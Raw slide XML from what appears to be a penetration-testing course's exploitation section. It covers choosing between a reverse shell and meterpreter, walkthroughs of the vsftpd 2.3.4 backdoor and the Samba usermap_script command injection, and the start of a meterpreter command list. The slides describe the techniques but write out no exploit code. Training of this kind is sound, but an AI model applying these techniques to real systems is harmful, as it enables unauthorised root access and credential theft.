          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SHELL OR METERPRETER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4251960"/>
            <a:ext cx="11064240" cy="2103120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>cmd/unix/reverse </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>gives you a plain shell. Works almost everywhere, does almost nothing extra.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>meterpreter </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>runs in memory and gives you file transfer, port forwarding, screenshots, hashdump and post modules.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Pick the smallest thing that works. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Meterpreter is heavier and far more likely to be caught by endpoint protection on a real target.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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06 / EXPLOITATION</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Walkthrough 1: vsftpd 2.3.4</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50</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_msf_vsftpd.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="6583680" cy="4315968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7452360" y="1481328"/>
            <a:ext cx="4187952" cy="2377440"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2692"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699248" y="1664208"/>
            <a:ext cx="3749040" cy="320040"/>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What happened in 2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699248" y="2084832"/>
            <a:ext cx="3749040" cy="1691640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Somebody compromised the vsftpd download server and added a backdoor to the source. Log in with a username ending in a smiley face and the daemon opens a root shell on port 6200. It was caught in three days, but the version lives on in every training VM.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7452360" y="4023360"/>
            <a:ext cx="4187952" cy="1773936"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3608"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699248" y="4206240"/>
            <a:ext cx="3749040" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>CVE-2011-2523</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699248" y="4572000"/>
            <a:ext cx="3794760" cy="1188720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No payload to choose, the backdoor is the payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>You land as root immediately</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This is a supply chain attack, fifteen years before the phrase was popular</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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06 / EXPLOITATION</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Walkthrough 2: Samba usermap_script</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51</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_msf_samba.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="6583680" cy="3959352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7452360" y="1481328"/>
            <a:ext cx="4187952" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2545"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699248" y="1664208"/>
            <a:ext cx="3749040" cy="320040"/>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Why this one works</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699248" y="2084832"/>
            <a:ext cx="3749040" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Samba 3.0.20 passes the username straight into a shell command when the username map script option is set. Send a username containing shell metacharacters and Samba runs it for you, as root, before authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7452360" y="4160520"/>
            <a:ext cx="4187952" cy="1645920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3889"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699248" y="4343400"/>
            <a:ext cx="3749040" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>CVE-2007-2447</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699248" y="4709160"/>
            <a:ext cx="3794760" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Command injection, the same class of bug as in web applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Needs a payload and an LHOST, unlike walkthrough 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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06 / EXPLOITATION</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Meterpreter: the commands that matter</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52</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1463040"/>
            <a:ext cx="11091672" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="1554480"/>
            <a:ext cx="5486400" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="1572768"/>
            <a:ext cx="5212080" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>OS, architecture, hostname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="2130552"/>
            <a:ext cx="5486400" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
